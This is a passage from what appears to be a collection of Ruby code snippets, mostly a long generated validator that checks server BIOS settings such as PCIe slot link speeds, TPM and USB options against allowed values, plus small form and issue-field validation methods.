\"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_flom_link_speed_validator.valid?(@slot_flom_link_speed)\n slot_front_nvme10link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme10link_speed_validator.valid?(@slot_front_nvme10link_speed)\n slot_front_nvme10option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme10option_rom_validator.valid?(@slot_front_nvme10option_rom)\n slot_front_nvme11link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme11link_speed_validator.valid?(@slot_front_nvme11link_speed)\n slot_front_nvme11option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme11option_rom_validator.valid?(@slot_front_nvme11option_rom)\n slot_front_nvme12link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme12link_speed_validator.valid?(@slot_front_nvme12link_speed)\n slot_front_nvme12option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme12option_rom_validator.valid?(@slot_front_nvme12option_rom)\n slot_front_nvme13option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme13option_rom_validator.valid?(@slot_front_nvme13option_rom)\n slot_front_nvme14option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme14option_rom_validator.valid?(@slot_front_nvme14option_rom)\n slot_front_nvme15option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme15option_rom_validator.valid?(@slot_front_nvme15option_rom)\n slot_front_nvme16option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme16option_rom_validator.valid?(@slot_front_nvme16option_rom)\n slot_front_nvme17option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme17option_rom_validator.valid?(@slot_front_nvme17option_rom)\n slot_front_nvme18option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme18option_rom_validator.valid?(@slot_front_nvme18option_rom)\n slot_front_nvme19option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme19option_rom_validator.valid?(@slot_front_nvme19option_rom)\n slot_front_nvme1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme1link_speed_validator.valid?(@slot_front_nvme1link_speed)\n slot_front_nvme1option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme1option_rom_validator.valid?(@slot_front_nvme1option_rom)\n slot_front_nvme20option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme20option_rom_validator.valid?(@slot_front_nvme20option_rom)\n slot_front_nvme21option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme21option_rom_validator.valid?(@slot_front_nvme21option_rom)\n slot_front_nvme22option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme22option_rom_validator.valid?(@slot_front_nvme22option_rom)\n slot_front_nvme23option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme23option_rom_validator.valid?(@slot_front_nvme23option_rom)\n slot_front_nvme24option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme24option_rom_validator.valid?(@slot_front_nvme24option_rom)\n slot_front_nvme2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme2link_speed_validator.valid?(@slot_front_nvme2link_speed)\n slot_front_nvme2option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme2option_rom_validator.valid?(@slot_front_nvme2option_rom)\n slot_front_nvme3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme3link_speed_validator.valid?(@slot_front_nvme3link_speed)\n slot_front_nvme3option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme3option_rom_validator.valid?(@slot_front_nvme3option_rom)\n slot_front_nvme4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme4link_speed_validator.valid?(@slot_front_nvme4link_speed)\n slot_front_nvme4option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme4option_rom_validator.valid?(@slot_front_nvme4option_rom)\n slot_front_nvme5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme5link_speed_validator.valid?(@slot_front_nvme5link_speed)\n slot_front_nvme5option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme5option_rom_validator.valid?(@slot_front_nvme5option_rom)\n slot_front_nvme6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme6link_speed_validator.valid?(@slot_front_nvme6link_speed)\n slot_front_nvme6option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme6option_rom_validator.valid?(@slot_front_nvme6option_rom)\n slot_front_nvme7link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme7link_speed_validator.valid?(@slot_front_nvme7link_speed)\n slot_front_nvme7option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme7option_rom_validator.valid?(@slot_front_nvme7option_rom)\n slot_front_nvme8link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme8link_speed_validator.valid?(@slot_front_nvme8link_speed)\n slot_front_nvme8option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme8option_rom_validator.valid?(@slot_front_nvme8option_rom)\n slot_front_nvme9link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_front_nvme9link_speed_validator.valid?(@slot_front_nvme9link_speed)\n slot_front_nvme9option_rom_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_front_nvme9option_rom_validator.valid?(@slot_front_nvme9option_rom)\n slot_front_slot5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_front_slot5link_speed_validator.valid?(@slot_front_slot5link_speed)\n slot_front_slot6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_front_slot6link_speed_validator.valid?(@slot_front_slot6link_speed)\n slot_gpu1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu1state_validator.valid?(@slot_gpu1state)\n slot_gpu2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu2state_validator.valid?(@slot_gpu2state)\n slot_gpu3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu3state_validator.valid?(@slot_gpu3state)\n slot_gpu4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu4state_validator.valid?(@slot_gpu4state)\n slot_gpu5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu5state_validator.valid?(@slot_gpu5state)\n slot_gpu6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu6state_validator.valid?(@slot_gpu6state)\n slot_gpu7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu7state_validator.valid?(@slot_gpu7state)\n slot_gpu8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_gpu8state_validator.valid?(@slot_gpu8state)\n slot_hba_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_hba_link_speed_validator.valid?(@slot_hba_link_speed)\n slot_hba_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_hba_state_validator.valid?(@slot_hba_state)\n slot_lom1link_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_lom1link_validator.valid?(@slot_lom1link)\n slot_lom2link_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_lom2link_validator.valid?(@slot_lom2link)\n slot_mezz_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_mezz_state_validator.valid?(@slot_mezz_state)\n slot_mlom_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_mlom_link_speed_validator.valid?(@slot_mlom_link_speed)\n slot_mlom_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_mlom_state_validator.valid?(@slot_mlom_state)\n slot_mraid_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_mraid_link_speed_validator.valid?(@slot_mraid_link_speed)\n slot_mraid_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_mraid_state_validator.valid?(@slot_mraid_state)\n slot_n10state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n10state_validator.valid?(@slot_n10state)\n slot_n11state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n11state_validator.valid?(@slot_n11state)\n slot_n12state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n12state_validator.valid?(@slot_n12state)\n slot_n13state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n13state_validator.valid?(@slot_n13state)\n slot_n14state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n14state_validator.valid?(@slot_n14state)\n slot_n15state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n15state_validator.valid?(@slot_n15state)\n slot_n16state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n16state_validator.valid?(@slot_n16state)\n slot_n17state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n17state_validator.valid?(@slot_n17state)\n slot_n18state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n18state_validator.valid?(@slot_n18state)\n slot_n19state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n19state_validator.valid?(@slot_n19state)\n slot_n1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_n1state_validator.valid?(@slot_n1state)\n slot_n20state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n20state_validator.valid?(@slot_n20state)\n slot_n21state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n21state_validator.valid?(@slot_n21state)\n slot_n22state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n22state_validator.valid?(@slot_n22state)\n slot_n23state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n23state_validator.valid?(@slot_n23state)\n slot_n24state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n24state_validator.valid?(@slot_n24state)\n slot_n2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_n2state_validator.valid?(@slot_n2state)\n slot_n3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n3state_validator.valid?(@slot_n3state)\n slot_n4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n4state_validator.valid?(@slot_n4state)\n slot_n5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n5state_validator.valid?(@slot_n5state)\n slot_n6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n6state_validator.valid?(@slot_n6state)\n slot_n7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n7state_validator.valid?(@slot_n7state)\n slot_n8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n8state_validator.valid?(@slot_n8state)\n slot_n9state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_n9state_validator.valid?(@slot_n9state)\n slot_raid_link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_raid_link_speed_validator.valid?(@slot_raid_link_speed)\n slot_raid_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_raid_state_validator.valid?(@slot_raid_state)\n slot_rear_nvme1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_rear_nvme1link_speed_validator.valid?(@slot_rear_nvme1link_speed)\n slot_rear_nvme1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme1state_validator.valid?(@slot_rear_nvme1state)\n slot_rear_nvme2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_rear_nvme2link_speed_validator.valid?(@slot_rear_nvme2link_speed)\n slot_rear_nvme2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme2state_validator.valid?(@slot_rear_nvme2state)\n slot_rear_nvme3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_rear_nvme3link_speed_validator.valid?(@slot_rear_nvme3link_speed)\n slot_rear_nvme3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme3state_validator.valid?(@slot_rear_nvme3state)\n slot_rear_nvme4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\", \"GEN4\"])\n return false unless slot_rear_nvme4link_speed_validator.valid?(@slot_rear_nvme4link_speed)\n slot_rear_nvme4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme4state_validator.valid?(@slot_rear_nvme4state)\n slot_rear_nvme5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme5state_validator.valid?(@slot_rear_nvme5state)\n slot_rear_nvme6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme6state_validator.valid?(@slot_rear_nvme6state)\n slot_rear_nvme7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme7state_validator.valid?(@slot_rear_nvme7state)\n slot_rear_nvme8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless slot_rear_nvme8state_validator.valid?(@slot_rear_nvme8state)\n slot_riser1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser1link_speed_validator.valid?(@slot_riser1link_speed)\n slot_riser1slot1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser1slot1link_speed_validator.valid?(@slot_riser1slot1link_speed)\n slot_riser1slot2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser1slot2link_speed_validator.valid?(@slot_riser1slot2link_speed)\n slot_riser1slot3link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser1slot3link_speed_validator.valid?(@slot_riser1slot3link_speed)\n slot_riser2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser2link_speed_validator.valid?(@slot_riser2link_speed)\n slot_riser2slot4link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser2slot4link_speed_validator.valid?(@slot_riser2slot4link_speed)\n slot_riser2slot5link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser2slot5link_speed_validator.valid?(@slot_riser2slot5link_speed)\n slot_riser2slot6link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_riser2slot6link_speed_validator.valid?(@slot_riser2slot6link_speed)\n slot_sas_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"Legacy Only\", \"UEFI Only\"])\n return false unless slot_sas_state_validator.valid?(@slot_sas_state)\n slot_ssd_slot1link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_ssd_slot1link_speed_validator.valid?(@slot_ssd_slot1link_speed)\n slot_ssd_slot2link_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"GEN1\", \"GEN2\", \"GEN3\"])\n return false unless slot_ssd_slot2link_speed_validator.valid?(@slot_ssd_slot2link_speed)\n smee_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless smee_validator.valid?(@smee)\n smt_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Off\"])\n return false unless smt_mode_validator.valid?(@smt_mode)\n snc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless snc_validator.valid?(@snc)\n snoopy_mode_for2lm_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless snoopy_mode_for2lm_validator.valid?(@snoopy_mode_for2lm)\n snoopy_mode_for_ad_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless snoopy_mode_for_ad_validator.valid?(@snoopy_mode_for_ad)\n sparing_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"dimm-sparing\", \"rank-sparing\"])\n return false unless sparing_mode_validator.valid?(@sparing_mode)\n sr_iov_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless sr_iov_validator.valid?(@sr_iov)\n streamer_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless streamer_prefetch_validator.valid?(@streamer_prefetch)\n svm_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless svm_mode_validator.valid?(@svm_mode)\n terminal_type_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"pc-ansi\", \"vt100\", \"vt100-plus\", \"vt-utf8\"])\n return false unless terminal_type_validator.valid?(@terminal_type)\n tpm_control_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless tpm_control_validator.valid?(@tpm_control)\n tpm_pending_operation_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"None\", \"TpmClear\"])\n return false unless tpm_pending_operation_validator.valid?(@tpm_pending_operation)\n tpm_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless tpm_support_validator.valid?(@tpm_support)\n tsme_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless tsme_validator.valid?(@tsme)\n txt_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless txt_support_validator.valid?(@txt_support)\n ucsm_boot_order_rule_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Loose\", \"Strict\"])\n return false unless ucsm_boot_order_rule_validator.valid?(@ucsm_boot_order_rule)\n ufs_disable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless ufs_disable_validator.valid?(@ufs_disable)\n uma_based_clustering_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disable (All2All)\", \"Hemisphere (2-clusters)\"])\n return false unless uma_based_clustering_validator.valid?(@uma_based_clustering)\n upi_link_enablement_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1\", \"2\", \"Auto\"])\n return false unless upi_link_enablement_validator.valid?(@upi_link_enablement)\n upi_power_management_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless upi_power_management_validator.valid?(@upi_power_management)\n usb_emul6064_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_emul6064_validator.valid?(@usb_emul6064)\n usb_port_front_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_front_validator.valid?(@usb_port_front)\n usb_port_internal_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_internal_validator.valid?(@usb_port_internal)\n usb_port_kvm_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_kvm_validator.valid?(@usb_port_kvm)\n usb_port_rear_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_rear_validator.valid?(@usb_port_rear)\n usb_port_sd_card_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_sd_card_validator.valid?(@usb_port_sd_card)\n usb_port_vmedia_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_port_vmedia_validator.valid?(@usb_port_vmedia)\n usb_xhci_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless usb_xhci_support_validator.valid?(@usb_xhci_support)\n vga_priority_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Offboard\", \"Onboard\", \"Onboard VGA Disabled\"])\n return false unless vga_priority_validator.valid?(@vga_priority)\n virtual_numa_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless virtual_numa_validator.valid?(@virtual_numa)\n vmd_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless vmd_enable_validator.valid?(@vmd_enable)\n vol_memory_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1LM\", \"2LM\"])\n return false unless vol_memory_mode_validator.valid?(@vol_memory_mode)\n work_load_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Balanced\", \"I/O Sensitive\", \"NUMA\", \"UMA\"])\n return false unless work_load_config_validator.valid?(@work_load_config)\n xpt_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless xpt_prefetch_validator.valid?(@xpt_prefetch)\n xpt_remote_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless xpt_remote_prefetch_validator.valid?(@xpt_remote_prefetch)\n true && super\n end",
"def valid?\n return false if !@code.nil? && @code.to_s.length > 6\n return false if !@start_date.nil? && @start_date.to_s.length > 10\n return false if !@end_date.nil? && @end_date.to_s.length > 10\n return false if !@condition_reason.nil? && @condition_reason.to_s.length > 6\n return false if !@condition_reason_text.nil? && @condition_reason_text.to_s.length > 1000\n return false if !@condition_to_apply.nil? && @condition_to_apply.to_s.length > 1000\n return false if !@regions.nil? && @regions.to_s.length > 1000\n return false if !@number_or_percentage_home_visit_type.nil? && @number_or_percentage_home_visit_type.to_s.length > 6\n return false if !@number_or_percentage_home_visit.nil? && @number_or_percentage_home_visit.to_s.length > 3\n return false if !@frequency_of_visit.nil? && @frequency_of_visit.to_s.length > 60\n true\n end",
"def is_date_nil\n\t\tif @start_date.blank? && @start_time.blank?\n\t\t\terrors.add(:start_date, \"Please enter a date.\")\n\t\t\terrors.add(:start_time, \"Please enter a time.\")\n\t\tend\n\n\t\tif @start_date.blank? && @start_time.present?\n\t\t\terrors.add(:start_date, \"Please enter a date.\")\n\t\tend\n\n\t\tif @start_time.blank? && @start_date.present?\n\t\t\terrors.add(:start_time, \"Please enter a time.\")\n\t\tend\n\tend",
"def validate_required_fields\n user = new_record? ? author : current_journal.try(:user)\n\n required_attribute_names(user).each do |attribute|\n if /^\\d+$/.match?(attribute)\n attribute = attribute.to_i\n v = custom_field_values.detect {|v| v.custom_field_id == attribute}\n if v && Array(v.value).detect(&:present?).nil?\n errors.add(v.custom_field.name, l('activerecord.errors.messages.blank'))\n end\n else\n if respond_to?(attribute) && send(attribute).blank? && !disabled_core_fields.include?(attribute)\n next if attribute == 'category_id' && project.try(:issue_categories).blank?\n next if attribute == 'fixed_version_id' && assignable_versions.blank?\n\n #####\n # START PATCH\n next if attribute == 'typology_id' && !project.module_enabled?('typologies')\n next if attribute == 'typology_id' && project.typologies.blank?\n # END PATCH\n #####\n\n errors.add attribute, :blank\n end\n end\n end\n end",
